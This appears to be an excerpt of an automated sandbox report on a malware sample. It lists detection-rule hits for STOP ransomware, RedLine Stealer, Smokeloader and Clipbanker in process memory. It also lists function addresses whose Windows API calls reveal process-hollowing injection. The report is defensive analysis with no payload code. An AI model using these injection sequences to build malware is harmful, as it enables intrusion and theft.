Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000020.00000002.2341456493.00000000008DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.2076965546.000000000494A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001F.00000002.2266884728.00000000049E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000E.00000002.2060271846.00000000049DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000004.00000002.1982585941.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001A.00000002.2243695606.0000000000BBD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000022.00000002.2343814651.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1982802841.0000000002F1B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000012.00000002.2110277221.0000000002E0E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000022.00000002.2344257451.0000000002EBE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.2186670157.00000000049D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 7048, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 2844, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 2764, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 5688, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 5436, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 6008, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 3128, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 916, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E609.exe PID: 4956, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401603
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040161A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004026D2 NtOpenKey,	0_2_004026D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402745 NtEnumerateKey,	0_2_00402745
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation,	0_2_00402348
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040156B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402770 NtEnumerateKey,	0_2_00402770
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation,	0_2_0040217B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation,	0_2_0040217D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation,	0_2_004021CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004017DF NtMapViewOfSection,NtMapViewOfSection,	0_2_004017DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015F5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation,	0_2_00402188
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004027A0 NtClose,	0_2_004027A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation,	0_2_004021A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation,	0_2_004021BB
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015D5
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401603
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040161A
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004026D2 NtOpenKey,	4_2_004026D2
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_00402745 NtEnumerateKey,	4_2_00402745
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation,	4_2_00402348
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040156B
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_00402770 NtEnumerateKey,	4_2_00402770
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation,	4_2_0040217B
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation,	4_2_0040217D
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation,	4_2_004021CB
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004017DF NtMapViewOfSection,NtMapViewOfSection,	4_2_004017DF
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015E0
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015F1
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015F5
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015F8
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation,	4_2_00402188
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004027A0 NtClose,	4_2_004027A0
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation,	4_2_004021A1
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation,	4_2_004021BB
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A10110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	9_2_04A10110
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A70110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	14_2_04A70110

Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A13520	9_2_04A13520
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A17520	9_2_04A17520
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A1A699	9_2_04A1A699
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A5B69F	9_2_04A5B69F
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A1E6E0	9_2_04A1E6E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A1A79A	9_2_04A1A79A
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A3D7F1	9_2_04A3D7F1
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A1C760	9_2_04A1C760
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A1B0B0	9_2_04A1B0B0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A170E0	9_2_04A170E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A130F0	9_2_04A130F0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A200D0	9_2_04A200D0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A1A026	9_2_04A1A026
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A2F030	9_2_04A2F030
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A1B000	9_2_04A1B000
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A3D1A4	9_2_04A3D1A4
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A19120	9_2_04A19120
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A5E141	9_2_04A5E141
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A922C0	9_2_04A922C0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A17220	9_2_04A17220
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A17393	9_2_04A17393
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A5E37C	9_2_04A5E37C
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A15DE7	9_2_04A15DE7
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A15DF7	9_2_04A15DF7
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A52D1E	9_2_04A52D1E
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A44E9F	9_2_04A44E9F
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A18E60	9_2_04A18E60
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A17880	9_2_04A17880
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A318D0	9_2_04A318D0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A3E9A3	9_2_04A3E9A3
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A3F9B0	9_2_04A3F9B0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A159F7	9_2_04A159F7
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A189D0	9_2_04A189D0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A1A916	9_2_04A1A916
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A17A80	9_2_04A17A80
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A1CA10	9_2_04A1CA10
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A1DBE0	9_2_04A1DBE0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A20B00	9_2_04A20B00
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A12B60	9_2_04A12B60
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040D240	10_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00419F90	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00405057	10_2_00405057
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040C070	10_2_0040C070
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0042E003	10_2_0042E003
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0042F010	10_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00408030	10_2_00408030
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_004070E0	10_2_004070E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00410160	10_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_004C8113	10_2_004C8113
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_004021C0	10_2_004021C0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_004C9343	10_2_004C9343
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0044237E	10_2_0044237E
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00405447	10_2_00405447
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00405457	10_2_00405457
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_004084C0	10_2_004084C0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_004344FF	10_2_004344FF
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00449506	10_2_00449506
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0043E5A3	10_2_0043E5A3
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0044B5B1	10_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040A660	10_2_0040A660
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00409686	10_2_00409686
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0041E690	10_2_0041E690
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00406740	10_2_00406740
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00402750	10_2_00402750
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040A710	10_2_0040A710
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040F730	10_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00408780	10_2_00408780
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0044D7A1	10_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0042C804	10_2_0042C804
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00406880	10_2_00406880
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00481920	10_2_00481920
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0044D9DC	10_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_004069F3	10_2_004069F3
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00449A71	10_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00443B40	10_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00402B80	10_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00406B80	10_2_00406B80
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00409CF9	10_2_00409CF9
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0044ACFF	10_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040DD40	10_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00427D6C	10_2_00427D6C
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040BDC0	10_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00409DFA	10_2_00409DFA
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0042CE51	10_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00406EE0	10_2_00406EE0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00409F76	10_2_00409F76
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00420F30	10_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00449FE3	10_2_00449FE3
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A73520	14_2_04A73520
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A77520	14_2_04A77520
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04ABB69F	14_2_04ABB69F
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A7A699	14_2_04A7A699
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A7E6E0	14_2_04A7E6E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A7A79A	14_2_04A7A79A
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A9D7F1	14_2_04A9D7F1
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A7C760	14_2_04A7C760
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A7B0B0	14_2_04A7B0B0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A770E0	14_2_04A770E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A730F0	14_2_04A730F0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A800D0	14_2_04A800D0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A7A026	14_2_04A7A026
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A8F030	14_2_04A8F030
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A7B000	14_2_04A7B000
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A9D1A4	14_2_04A9D1A4
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A79120	14_2_04A79120
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04ABE141	14_2_04ABE141
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04AF22C0	14_2_04AF22C0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A77220	14_2_04A77220
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A77393	14_2_04A77393
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04ABE37C	14_2_04ABE37C
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A75DE7	14_2_04A75DE7
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A75DF7	14_2_04A75DF7
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04AB2D1E	14_2_04AB2D1E
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04AA4E9F	14_2_04AA4E9F
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A78E60	14_2_04A78E60
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A77880	14_2_04A77880
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A918D0	14_2_04A918D0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A9E9A3	14_2_04A9E9A3
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A9F9B0	14_2_04A9F9B0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A759F7	14_2_04A759F7
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A789D0	14_2_04A789D0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A7A916	14_2_04A7A916
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A77A80	14_2_04A77A80
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A7CA10	14_2_04A7CA10
